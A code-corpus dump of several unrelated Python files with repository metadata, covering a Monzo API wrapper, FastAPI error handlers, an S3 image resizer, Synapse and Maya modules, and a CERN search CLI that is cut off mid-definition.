] | 3
|
2021-03-31T20:15:40.000Z
|
2022-02-09T23:50:46.000Z
|
built-in/TensorFlow/Research/cv/image_classification/Darts_for_TensorFlow/automl/vega/algorithms/nas/sm_nas/mmdet_meta_cfgs/bbox_head/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 2
|
2021-07-10T12:40:46.000Z
|
2021-12-17T07:55:15.000Z
|
from .cascade_head import CascadeFCBBoxHead
from .convfc_bbox_head import SharedFCBBoxHead
__all__ = [
'CascadeFCBBoxHead',
'SharedFCBBoxHead']
| 21.857143
| 46
| 0.79085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.24183
|
221167d3228359aec0ed9b72908eb095312e240f
| 3,146
|
py
|
Python
|
monzo/model/monzoaccount.py
|
elementechemlyn/pythonzo
|
ff6124119c7fe8c68c4bfa0e5d59b79ad442c1fc
|
[
"MIT"
] | null | null | null |
monzo/model/monzoaccount.py
|
elementechemlyn/pythonzo
|
ff6124119c7fe8c68c4bfa0e5d59b79ad442c1fc
|
[
"MIT"
] | 1
|
2021-06-01T22:01:40.000Z
|
2021-06-01T22:01:40.000Z
|
monzo/model/monzoaccount.py
|
elementechemlyn/pythonzo
|
ff6124119c7fe8c68c4bfa0e5d59b79ad442c1fc
|
[
"MIT"
] | null | null | null |
import datetime
from .monzobalance import MonzoBalance
from .monzopagination import MonzoPaging
from .monzotransaction import MonzoTransaction
class MonzoAccount(object):
def __init__(self,api,json_dict=None):
self.api = api
self.account_id = None
self.created = None
self.description = None
self.account_type = None
self.balance = None
if json_dict:
self.account_id = json_dict.get("id",None)
self.description = json_dict.get("description",None)
self.account_type = json_dict.get("type",None)
self.created = json_dict.get("created",None)
if self.created:
self.created = datetime.datetime.strptime(self.created,"%Y-%m-%dT%H:%M:%S.%fZ")
@classmethod
def listAccounts(cls,api):
accounts = []
accounts_json = api.listAccounts()
for account_json in accounts_json["accounts"]:
account = cls(api,account_json)
accounts.append(account)
return accounts
@classmethod
def getAccount(cls,api,account_id):
accounts_json = api.listAccounts()
for account_json in accounts_json["accounts"]:
account = cls(api,account_json)
if account.account_id == account_id:
account.readBalance()
return account
return None
def readBalance(self):
balance_json = self.api.readBalance(self.account_id)
self.balance = MonzoBalance(self.api,balance_json)
return self.balance
def listTransactionsThisMonth(self,expand=None):
now = datetime.datetime.now()
this_month = now.replace(day=1,hour=0,minute=0,second=0,microsecond=0)
page = MonzoPaging()
page.set_since_date(this_month)
return self.listTransactions(page,expand)
def listTransactionsToday(self,expand=None):
now = datetime.datetime.now()
today = now.replace(hour=0,minute=0,second=0,microsecond=0)
page = MonzoPaging()
page.set_since_date(today)
return self.listTransactions(page,expand)
def listTransactionSinceDate(self,from_dt,expand=None):
page = MonzoPaging()
page.set_since_date(from_dt)
return self.listTransactions(page,expand)
def listTransactionsSinceTransaction(self,trans_id,expand=None):
page = MonzoPaging()
page.set_since_trans(trans_id)
return self.listTransactions(page,expand)
def listTransactionsBetween(self,since_dt,to_dt,expand=None):
page = MonzoPaging()
page.set_since_date(since_dt)
page.set_before(to_dt)
return self.listTransactions(page,expand)
def listTransactions(self,pagination=None,expand=None):
transactions = []
transactions_json = self.api.listTransactions(self.account_id,pagination,expand)
for transaction_json in transactions_json["transactions"]:
transaction = MonzoTransaction(self.api,transaction_json)
transactions.append(transaction)
return transactions
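# Hedged usage sketch (the `api` object and its account data are illustrative;
# it must implement listAccounts/readBalance/listTransactions as used above):
#
# accounts = MonzoAccount.listAccounts(api)
# for account in accounts:
#     balance = account.readBalance()
#     for transaction in account.listTransactionsThisMonth():
#         print(account.description, transaction)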
| 35.75
| 95
| 0.651939
| 2,991
| 0.950731
| 0
| 0
| 600
| 0.190718
| 0
| 0
| 89
| 0.02829
|
22117a7dbdd2a79f096b01e929739e3fe71da985
| 3,718
|
py
|
Python
|
learninghouse/api/errors/__init__.py
|
DerOetzi/learninghouse-core
|
ece900b2a333b8ea9710609322cfefeeaf694cf8
|
[
"MIT"
] | 1
|
2021-11-02T13:52:11.000Z
|
2021-11-02T13:52:11.000Z
|
learninghouse/api/errors/__init__.py
|
DerOetzi/learninghouse-core
|
ece900b2a333b8ea9710609322cfefeeaf694cf8
|
[
"MIT"
] | null | null | null |
learninghouse/api/errors/__init__.py
|
DerOetzi/learninghouse-core
|
ece900b2a333b8ea9710609322cfefeeaf694cf8
|
[
"MIT"
] | 1
|
2020-08-27T20:03:36.000Z
|
2020-08-27T20:03:36.000Z
|
from typing import Dict, Optional
from fastapi import status, Request
from fastapi.responses import JSONResponse
from fastapi.exceptions import RequestValidationError
from learninghouse.models import LearningHouseErrorMessage
MIMETYPE_JSON = 'application/json'
class LearningHouseException(Exception):
STATUS_CODE = status.HTTP_500_INTERNAL_SERVER_ERROR
UNKNOWN = 'UNKNOWN'
DESCRIPTION = 'An unknown exception occurred ' +\
'while handling your request.'
def __init__(self,
status_code: Optional[int] = None,
key: Optional[str] = None,
description: Optional[str] = None):
super().__init__()
self.http_status_code: int = status_code or self.STATUS_CODE
self.error: LearningHouseErrorMessage = LearningHouseErrorMessage(
error=key or self.UNKNOWN,
description=description or self.DESCRIPTION
)
def response(self) -> JSONResponse:
return JSONResponse(content=self.error.dict(), status_code=self.http_status_code)
@classmethod
def api_description(cls) -> Dict:
return {
'model': LearningHouseErrorMessage,
'description': 'An exception occurred which is not currently handled by the service. ' +
'Please write an issue on GitHub.',
'content': {
MIMETYPE_JSON: {
'example': {
'error': cls.UNKNOWN,
'description': cls.DESCRIPTION
}
}
}
}
class LearningHouseSecurityException(LearningHouseException):
STATUS_CODE = status.HTTP_403_FORBIDDEN
SECURITY_EXCEPTION = 'SECURITY_EXCEPTION'
DESCRIPTION = 'A security violation occured while handling your request.'
def __init__(self, description: str):
super().__init__(self.STATUS_CODE,
self.SECURITY_EXCEPTION,
description or self.DESCRIPTION)
@classmethod
def api_description(cls) -> Dict:
return {
'model': LearningHouseErrorMessage,
'description': 'The request didn\'t pass security checks.',
'content': {
MIMETYPE_JSON: {
'example': {
'error': cls.SECURITY_EXCEPTION,
'description': cls.DESCRIPTION
}
}
}
}
class LearningHouseValidationError(LearningHouseException):
STATUS_CODE = status.HTTP_422_UNPROCESSABLE_ENTITY
VALIDATION_ERROR = 'VALIDATION_ERROR'
DESCRIPTION = 'A validation error occurred while handling your request.'
def __init__(self, description: Optional[str] = None):
super().__init__(self.STATUS_CODE,
self.VALIDATION_ERROR,
description or self.DESCRIPTION)
@classmethod
def api_description(cls) -> Dict:
return {
'model': LearningHouseErrorMessage,
'description': 'The request didn\'t pass input validation',
'content': {
MIMETYPE_JSON: {
'example': {
'error': cls.VALIDATION_ERROR,
'description': cls.DESCRIPTION
}
}
}
}
async def validation_error_handler(request: Request, exc: RequestValidationError) -> JSONResponse: # pylint: disable=unused-argument
return LearningHouseValidationError(str(exc)).response()
async def learninghouse_exception_handler(request: Request, exc: LearningHouseException): # pylint: disable=unused-argument
return exc.response()
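# Hedged wiring sketch (illustrative; `app` is an assumed FastAPI instance,
# though add_exception_handler itself is standard FastAPI/Starlette):
#
# from fastapi import FastAPI
# app = FastAPI()
# app.add_exception_handler(RequestValidationError, validation_error_handler)
# app.add_exception_handler(LearningHouseException, learninghouse_exception_handler)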
| 34.747664
| 133
| 0.604088
| 3,095
| 0.832437
| 0
| 0
| 1,419
| 0.381657
| 344
| 0.092523
| 668
| 0.179666
|
2212ba611cd09cc95cb9831180998a6882517ddf
| 1,751
|
py
|
Python
|
moda/dataprep/create_dataset.py
|
Patte1808/moda
|
312c9594754ae0f6d17cbfafaa2c4c790c58efe5
|
[
"MIT"
] | null | null | null |
moda/dataprep/create_dataset.py
|
Patte1808/moda
|
312c9594754ae0f6d17cbfafaa2c4c790c58efe5
|
[
"MIT"
] | null | null | null |
moda/dataprep/create_dataset.py
|
Patte1808/moda
|
312c9594754ae0f6d17cbfafaa2c4c790c58efe5
|
[
"MIT"
] | null | null | null |
import pandas as pd
def get_windowed_ts(ranged_ts, window_size, with_actual=True):
"""
Creates a data frame where each row is a window of samples from the time series.
Each consecutive row is a shift of 1 cell from the previous row.
For example: [[1,2,3],[2,3,4],[3,4,5]]
:param ranged_ts: a pd.DataFrame containing one column for values and one pd.DatetimeIndex for dates
:param window_size: The number of timestamps to be used as features
:param with_actual: Whether to increase window size by one, and treat the last column as the ground truth
(relevant for forecasting scenarios). Returns the same output just with a window size bigger by 1.
:return:
"""
windowed_ts = ranged_ts
windowed_ts_copy = windowed_ts.copy()
for i in range(window_size - 1 + int(with_actual)):
windowed_ts = pd.concat([windowed_ts, windowed_ts_copy.shift(-(i + 1))], axis=1)
windowed_ts = windowed_ts.dropna(axis=0)
return windowed_ts
def split_history_and_current(windowed_ts):
"""
Returns the first n-1 columns as X, and the last column as y. Useful mainly for forecasting scenarios
:param windowed_ts: a pd.DataFrame with a date index and a column per timestamp. see get_windowed_ts
:return:
"""
X = windowed_ts.iloc[:, :-1].values
y = windowed_ts.iloc[:, -1].values
return (X, y)
if __name__ == "__main__":
ranged_ts = pd.DataFrame({"date": range(6), "value": range(6)})
ranged_ts["date"] = pd.to_datetime(ranged_ts["date"])
ranged_ts = ranged_ts.set_index(pd.DatetimeIndex(ranged_ts["date"]))
ranged_ts = ranged_ts.drop(columns="date")
ranged_ts.head()
windowed_df = get_windowed_ts(ranged_ts, window_size=3, with_actual=False)
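# Hedged continuation of the demo: with with_actual=True the window grows by
# one and the last column becomes the target, so X has shape (3, 3) and y (3,)
# for this 6-point series.
windowed_xy = get_windowed_ts(ranged_ts, window_size=3, with_actual=True)
X, y = split_history_and_current(windowed_xy)
print(X.shape, y.shape)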
| 38.065217
| 109
| 0.703027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 894
| 0.510565
|
22135083df33d8282602ed03efa2652030de4212
| 1,310
|
py
|
Python
|
test/test_ufunc.py
|
tuwien-cms/xprec
|
8f213aa9475342000883a56c56d54bb5208eb930
|
[
"MIT"
] | 6
|
2021-10-01T16:35:27.000Z
|
2022-01-05T18:21:39.000Z
|
test/test_ufunc.py
|
tuwien-cms/xprec
|
8f213aa9475342000883a56c56d54bb5208eb930
|
[
"MIT"
] | 8
|
2022-01-20T20:33:26.000Z
|
2022-03-25T09:27:49.000Z
|
test/test_ufunc.py
|
tuwien-cms/xprec
|
8f213aa9475342000883a56c56d54bb5208eb930
|
[
"MIT"
] | 1
|
2022-01-21T22:49:16.000Z
|
2022-01-21T22:49:16.000Z
|
# Copyright (C) 2021 Markus Wallerberger and others
# SPDX-License-Identifier: MIT
import numpy as np
import xprec
def _compare_ufunc(ufunc, *args, ulps=1):
fx_d = ufunc(*args)
fx_q = ufunc(*(a.astype(xprec.ddouble) for a in args)).astype(float)
# Ensure relative accuracy within the requested number of ulps
np.testing.assert_array_almost_equal_nulp(fx_d, fx_q, ulps)
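# e.g. _compare_ufunc(np.log, np.geomspace(1.0, 10.0, 5)) checks that log
# evaluated in double-double precision and cast back to float64 matches the
# plain float64 result to within `ulps` units in the last place.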
def test_log():
x = np.geomspace(1e-300, 1e300, 1953)
_compare_ufunc(np.log, x)
zeroq = xprec.ddouble.type(0)
assert np.isinf(np.log(zeroq))
def test_sqrt():
x = np.geomspace(1e-300, 1e300, 1953)
_compare_ufunc(np.sqrt, x)
def test_exp():
x = np.geomspace(1e-300, 700, 4953)
x = np.hstack([-x[::-1], 0, x])
_compare_ufunc(np.exp, x)
# Unfortunately, on Windows expm1 is less precise, so we need to increase
# the tolerance slightly
_compare_ufunc(np.expm1, x, ulps=2)
def test_cosh():
x = np.geomspace(1e-300, 700, 4953)
x = np.hstack([-x[::-1], 0, x])
_compare_ufunc(np.cosh, x)
_compare_ufunc(np.sinh, x)
thousand = xprec.ddouble.type(1000)
assert np.isinf(np.cosh(thousand))
assert np.isinf(np.cosh(-thousand))
def test_hypot():
x = np.geomspace(1e-300, 1e260, 47)
x = np.hstack([-x[::-1], 0, x])
_compare_ufunc(np.hypot, x[:,None], x[None,:])
| 24.716981
| 77
| 0.650382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 214
| 0.163359
|
22135b653bd172de4f59e045357620ffd83da98a
| 48
|
py
|
Python
|
echolect/millstone/__init__.py
|
ryanvolz/echolect
|
ec2594925f34fdaea69b64e725fccb0c99665a55
|
[
"BSD-3-Clause"
] | 1
|
2022-03-24T22:48:12.000Z
|
2022-03-24T22:48:12.000Z
|
echolect/millstone/__init__.py
|
scivision/echolect
|
ec2594925f34fdaea69b64e725fccb0c99665a55
|
[
"BSD-3-Clause"
] | 1
|
2015-03-25T20:41:24.000Z
|
2015-03-25T20:41:24.000Z
|
echolect/millstone/__init__.py
|
scivision/echolect
|
ec2594925f34fdaea69b64e725fccb0c99665a55
|
[
"BSD-3-Clause"
] | null | null | null |
from .read_hdf5 import *
from .hdf5_api import *
| 24
| 24
| 0.770833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
2214b7a4b4680d12ebfcca09d05d0ee1ade6215e
| 932
|
py
|
Python
|
pyptoolz/transforms.py
|
embedio/pyplinez
|
14b2e84d0f0bd86870d492a78f02c0b19810d3f6
|
[
"MIT"
] | null | null | null |
pyptoolz/transforms.py
|
embedio/pyplinez
|
14b2e84d0f0bd86870d492a78f02c0b19810d3f6
|
[
"MIT"
] | null | null | null |
pyptoolz/transforms.py
|
embedio/pyplinez
|
14b2e84d0f0bd86870d492a78f02c0b19810d3f6
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from toolz import itertoolz, curried
import vaex
transform_path_to_posix = lambda path: path.as_posix()
def path_to_posix():
return curried.valmap(transform_path_to_posix)
transform_xlsx_to_vaex = lambda path: vaex.from_ascii(path, seperator="\t")
def xlsx_to_vaex():
return curried.valmap(transform_xlsx_to_vaex)
transform_ascii_to_vaex = lambda path: vaex.from_ascii(path, seperator="\t")
def ascii_to_vaex():
return curried.valmap(transform_ascii_to_vaex)
transform_ascii_to_vaex2 = lambda path: vaex.from_ascii(path)
def ascii_to_vaex2():
return curried.valmap(transform_ascii_to_vaex2)
transform_vaex_to_list = lambda df: [itertoolz.second(x) for x in df.iterrows()]
def vaex_rows_to_list():
return curried.valmap(transform_vaex_to_list)
transform_vaex_to_dict = lambda df: df.to_dict()
def vaex_to_dict():
return curried.valmap(transform_vaex_to_dict)
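# Hedged usage sketch (paths are illustrative): each helper returns a curried
# valmap, i.e. a function that applies the transform to every value of a dict.
#
# paths = {"report": Path("data/report.txt")}
# path_to_posix()(paths)  # -> {"report": "data/report.txt"}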
| 20.26087
| 80
| 0.784335
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.008584
|
2214dd004a4a327669decd49302d44af0c040bf5
| 1,409
|
py
|
Python
|
experiments/s3-image-resize/chalicelib/s3_helpers.py
|
llamapope/chalice-experiments
|
f08fa0bade19c2659788a0678d89a4a63c2402d5
|
[
"MIT"
] | null | null | null |
experiments/s3-image-resize/chalicelib/s3_helpers.py
|
llamapope/chalice-experiments
|
f08fa0bade19c2659788a0678d89a4a63c2402d5
|
[
"MIT"
] | 2
|
2021-06-08T20:56:46.000Z
|
2022-01-13T02:15:29.000Z
|
experiments/s3-image-resize/chalicelib/s3_helpers.py
|
llamapope/chalice-experiments
|
f08fa0bade19c2659788a0678d89a4a63c2402d5
|
[
"MIT"
] | null | null | null |
import PIL
from PIL import Image
from io import BytesIO
import re
import logging
logger = logging.getLogger(__name__)
def resize(s3_client, bucket, original_key, width, height, suffix):
obj = s3_client.get_object(Bucket=bucket, Key=original_key)
full_size_key = original_key.replace('__incoming/', '')
ext = re.sub(r'.+\.([^.]+)$', r'\1', full_size_key)
key = re.sub(r'\.[^.]+$', '', full_size_key)
content_type = obj['ContentType']
if content_type == 'image/png':
image_type = 'PNG'
elif content_type == 'image/jpg' or content_type == 'image/jpeg':
image_type = 'JPEG'
else:
raise Exception(f'Invalid image type: {content_type}')
obj_body = obj['Body'].read()
img = Image.open(BytesIO(obj_body))
img = img.resize((width, height), PIL.Image.ANTIALIAS)
buffer = BytesIO()
img.save(buffer, image_type)
buffer.seek(0)
resized_key=f"{key}-{suffix}.{ext}"
# write the resized image
obj = s3_client.put_object(
Key=resized_key,
Bucket=bucket,
Body=buffer,
ContentType=content_type,
ACL='public-read')
# move the original out of __incoming
s3_client.copy_object(
Bucket=bucket,
Key=full_size_key,
CopySource=f'{bucket}/{original_key}',
ACL='public-read')
s3_client.delete_object(Bucket=bucket, Key=original_key)
logger.debug("resized: %s, key: %s", bucket, resized_key)
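# Hedged usage sketch (bucket and key names are illustrative):
#
# import boto3
# s3 = boto3.client("s3")
# resize(s3, "my-bucket", "__incoming/photos/cat.jpg", 320, 240, "small")
# # -> writes "photos/cat-small.jpg" and moves the original to "photos/cat.jpg"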
| 29.978723
| 69
| 0.628105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 308
| 0.218595
|
221552a2a64bb10ef85638e3e31fd395fcf10fcf
| 4,792
|
py
|
Python
|
synapse/handlers/room_member_worker.py
|
lukaslihotzki/synapse
|
1dfdc87b9bb07cc3c958dde7f41f2af4322477e5
|
[
"Apache-2.0"
] | 9,945
|
2015-01-02T07:41:06.000Z
|
2022-03-31T23:22:42.000Z
|
synapse/handlers/room_member_worker.py
|
lukaslihotzki/synapse
|
1dfdc87b9bb07cc3c958dde7f41f2af4322477e5
|
[
"Apache-2.0"
] | 9,320
|
2015-01-08T14:09:03.000Z
|
2022-03-31T21:11:24.000Z
|
synapse/handlers/room_member_worker.py
|
lukaslihotzki/synapse
|
1dfdc87b9bb07cc3c958dde7f41f2af4322477e5
|
[
"Apache-2.0"
] | 2,299
|
2015-01-31T22:16:29.000Z
|
2022-03-31T06:08:26.000Z
|
# Copyright 2018-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, List, Optional, Tuple
from synapse.api.errors import SynapseError
from synapse.handlers.room_member import RoomMemberHandler
from synapse.replication.http.membership import (
ReplicationRemoteJoinRestServlet as ReplRemoteJoin,
ReplicationRemoteKnockRestServlet as ReplRemoteKnock,
ReplicationRemoteRejectInviteRestServlet as ReplRejectInvite,
ReplicationRemoteRescindKnockRestServlet as ReplRescindKnock,
ReplicationUserJoinedLeftRoomRestServlet as ReplJoinedLeft,
)
from synapse.types import JsonDict, Requester, UserID
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class RoomMemberWorkerHandler(RoomMemberHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self._remote_join_client = ReplRemoteJoin.make_client(hs)
self._remote_knock_client = ReplRemoteKnock.make_client(hs)
self._remote_reject_client = ReplRejectInvite.make_client(hs)
self._remote_rescind_client = ReplRescindKnock.make_client(hs)
self._notify_change_client = ReplJoinedLeft.make_client(hs)
async def _remote_join(
self,
requester: Requester,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Implements RoomMemberHandler._remote_join"""
if len(remote_room_hosts) == 0:
raise SynapseError(404, "No known servers")
ret = await self._remote_join_client(
requester=requester,
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user_id=user.to_string(),
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_reject_invite(
self,
invite_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: dict,
) -> Tuple[str, int]:
"""
Rejects an out-of-band invite received from a remote user
Implements RoomMemberHandler.remote_reject_invite
"""
ret = await self._remote_reject_client(
invite_event_id=invite_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_rescind_knock(
self,
knock_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: JsonDict,
) -> Tuple[str, int]:
"""
Rescinds a local knock made on a remote room
Args:
knock_event_id: the knock event
txn_id: optional transaction ID supplied by the client
requester: user making the request, according to the access token
content: additional content to include in the leave event.
Normally an empty dict.
Returns:
A tuple containing (event_id, stream_id of the leave event)
"""
ret = await self._remote_rescind_client(
knock_event_id=knock_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_knock(
self,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Sends a knock to a room.
Implements RoomMemberHandler.remote_knock
"""
ret = await self._remote_knock_client(
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user=user,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def _user_left_room(self, target: UserID, room_id: str) -> None:
"""Implements RoomMemberHandler._user_left_room"""
await self._notify_change_client(
user_id=target.to_string(), room_id=room_id, change="left"
)
async def forget(self, target: UserID, room_id: str) -> None:
raise RuntimeError("Cannot forget rooms on workers.")
| 33.746479
| 77
| 0.660267
| 3,497
| 0.729758
| 0
| 0
| 0
| 0
| 2,997
| 0.625417
| 1,540
| 0.321369
|
22159f4a1c6d6e72ce319e5cebbbcc4d51c13acd
| 2,205
|
py
|
Python
|
win/devkit/other/pymel/extras/completion/py/maya/app/edl/importExport.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 10
|
2018-03-30T16:09:02.000Z
|
2021-12-07T07:29:19.000Z
|
win/devkit/other/pymel/extras/completion/py/maya/app/edl/importExport.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | null | null | null |
win/devkit/other/pymel/extras/completion/py/maya/app/edl/importExport.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 9
|
2018-06-02T09:18:49.000Z
|
2021-12-20T09:24:35.000Z
|
import tempfile
import maya.OpenMaya as OpenMaya
import maya.OpenMayaRender as OpenMayaRender
import maya.OpenMayaMPx as OpenMayaMPx
import maya.cmds as cmds
import maya
import re
from maya.app.edl.fcp import *
class ImportExport(OpenMayaMPx.MPxCommand):
def __del__(self):
pass
def __init__(self):
pass
class Exporter(ImportExport):
def __init__(self):
pass
def doIt(self, fileName):
pass
def setAllowPlayblast(self, allow):
"""
If true, will re-playblast of all shots whose clips are out of date
or non-existent.
"""
pass
class Importer(ImportExport):
def __init__(self):
pass
def doIt(self, fileName):
"""
Reads an EDL file into Maya. Will generate shots, tracks and audio in Maya that
corresponds to the tracks and clips in the EDL.
"""
pass
def setStartFrameOverride(self, frame):
pass
def _setTimeCode(timecode):
pass
def doExport(fileName, allowPlayblast):
"""
Exports the Maya sequence using the EDL Exporter class.
"""
pass
def doMel(*args, **kwargs):
"""
Takes as input a string containing MEL code, evaluates it, and returns the result.
This function takes a string which contains MEL code and evaluates it using
the MEL interpreter. The result is converted into a Python data type and is
returned.
If an error occurs during the execution of the MEL script, a Python exception
is raised with the appropriate error message.
"""
pass
def audioClipCompare(a, b):
pass
def _getValidClipObjectName(clipName, isVideo):
pass
def doImport(fileName, useStartFrameOverride, startFrame):
"""
Imports the specified file using the EDL Importer class.
"""
pass
def _nameToNode(name):
pass
def getTimeCode():
pass
def videoClipCompare(a, b):
pass
def getShotsResolution():
"""
Returns the video resolution of the sequencer if all the shots have the same resolution
Otherwise it returns False, 0, 0
"""
pass
mayaFrameRates = {}
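These are PyMEL completion stubs, so every body is empty; the docstrings still describe the intended API. A hedged sketch of how the documented entry points would be called from a running Maya session (file paths are illustrative, and this only works inside Maya with sequencer/EDL support loaded):
from maya.app.edl.importExport import doExport, doImport

doImport("/tmp/cut.xml", True, 101)   # import an EDL, overriding the start frame
doExport("/tmp/cut_out.xml", False)   # export without re-playblasting shots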
| 17.64
| 92
| 0.647166
| 798
| 0.361905
| 0
| 0
| 0
| 0
| 0
| 0
| 976
| 0.44263
|
22189dbba6fcdc9b59fa2a428105a701aaaf4a2f
| 1,040
|
py
|
Python
|
packages/mcni/python/mcni/instrument_simulator/__init__.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 5
|
2017-01-16T03:59:47.000Z
|
2020-06-23T02:54:19.000Z
|
packages/mcni/python/mcni/instrument_simulator/__init__.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 293
|
2015-10-29T17:45:52.000Z
|
2022-01-07T16:31:09.000Z
|
packages/mcni/python/mcni/instrument_simulator/__init__.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 1
|
2019-05-25T00:53:31.000Z
|
2019-05-25T00:53:31.000Z
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 2006-2010 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
## Note:
## 1. This package depends on dsm
def copyright():
return "mcni.instrument_simulators module: Copyright (c) 2006-2010 Jiao Lin";
def simulator(neutron_coordinates_transformer):
t = neutron_coordinates_transformer
from .AbstractInstrumentSimulator import AbstractInstrumentSimulator as base
class Simulator(base):
neutron_coordinates_transformer = t
pass
return Simulator()
from mcni.neutron_coordinates_transformers import default as default_neutron_coordinates_transformer
default_simulator = simulator( default_neutron_coordinates_transformer )
# version
__id__ = "$Id$"
# End of file
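A hedged usage sketch for the factory above; it mirrors how default_simulator is built, but with the transformer chosen explicitly (requires an mcvine installation):
# simulator() binds a coordinates transformer into a fresh Simulator class.
from mcni.neutron_coordinates_transformers import default as transformer
from mcni.instrument_simulator import simulator

sim = simulator(transformer)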
| 26.666667
| 100
| 0.575
| 79
| 0.075962
| 0
| 0
| 0
| 0
| 0
| 0
| 524
| 0.503846
|
22199caafbe2cf83aa5b2f765370eb9a8ab49f37
| 169
|
py
|
Python
|
todolist/wsgi.py
|
HangeZoe/django-todo-list
|
8a3232916e57724d52f0f93124f346d82b72e0ce
|
[
"MIT"
] | null | null | null |
todolist/wsgi.py
|
HangeZoe/django-todo-list
|
8a3232916e57724d52f0f93124f346d82b72e0ce
|
[
"MIT"
] | null | null | null |
todolist/wsgi.py
|
HangeZoe/django-todo-list
|
8a3232916e57724d52f0f93124f346d82b72e0ce
|
[
"MIT"
] | null | null | null |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'todolist.settings')
application = get_wsgi_application()
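The module's only job is to expose application; any WSGI server consumes it the same way. A minimal local smoke test using only the standard library (port choice is arbitrary):
# Serve the Django app with wsgiref for a quick manual check.
from wsgiref.simple_server import make_server

from todolist.wsgi import application

make_server("127.0.0.1", 8000, application).serve_forever()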
| 21.125
| 68
| 0.828402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 43
| 0.254438
|
221aaf010e11acc9785595a6c6873f1ea746ad9a
| 4,501
|
py
|
Python
|
cern_search_rest_api/modules/cernsearch/cli.py
|
inveniosoftware-contrib/citadel-search
|
736fdb3a5b32f750111bc846bc815c4671978fa1
|
[
"MIT"
] | 6
|
2020-04-12T18:30:08.000Z
|
2021-09-15T05:53:40.000Z
|
cern_search_rest_api/modules/cernsearch/cli.py
|
inveniosoftware-contrib/cern-search
|
736fdb3a5b32f750111bc846bc815c4671978fa1
|
[
"MIT"
] | 6
|
2020-03-19T13:28:38.000Z
|
2020-12-08T16:54:05.000Z
|
cern_search_rest_api/modules/cernsearch/cli.py
|
inveniosoftware-contrib/cern-search
|
736fdb3a5b32f750111bc846bc815c4671978fa1
|
[
"MIT"
] | 2
|
2019-04-22T21:20:17.000Z
|
2019-05-16T08:50:38.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of CERN Search.
# Copyright (C) 2018-2021 CERN.
#
# Citadel Search is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Click command-line utilities."""
import json
import click
from flask.cli import with_appcontext
from invenio_pidstore.models import PersistentIdentifier, PIDStatus
from invenio_records.models import RecordMetadata
from invenio_search import current_search
from invenio_search.cli import es_version_check
from cern_search_rest_api.modules.cernsearch.indexer import CernSearchRecordIndexer
from cern_search_rest_api.modules.cernsearch.indexer_tasks import process_bulk_queue
def abort_if_false(ctx, param, value):
"""Abort command is value is False."""
if not value:
ctx.abort()
@click.group()
def utils():
"""Misc management commands."""
@utils.command("runindex")
@click.option("--delayed", "-d", is_flag=True, help="Run indexing in background.")
@click.option(
"--chunk_size",
"-s",
default=500,
type=int,
help="Number of docs in one chunk sent to es (default: 500)",
)
@click.option(
"--max_chunk_bytes",
"-b",
default=int(99.9 * 1024 * 1024),
type=int,
help="The maximum size of the request in bytes (default: 100MB).",
)
@click.option(
"--concurrency",
"-c",
default=1,
type=int,
help="Number of concurrent indexing tasks to start.",
)
@click.option(
"--queue",
"-q",
type=str,
help="Name of the celery queue used to put the tasks into.",
)
@click.option("--version-type", help="Elasticsearch version type to use.")
@click.option(
"--raise-on-error/--skip-errors",
default=True,
help="Controls if Elasticsearch bulk indexing errors raise an exception.",
)
@with_appcontext
def run(
delayed,
chunk_size,
max_chunk_bytes,
concurrency,
queue=None,
version_type=None,
raise_on_error=True,
):
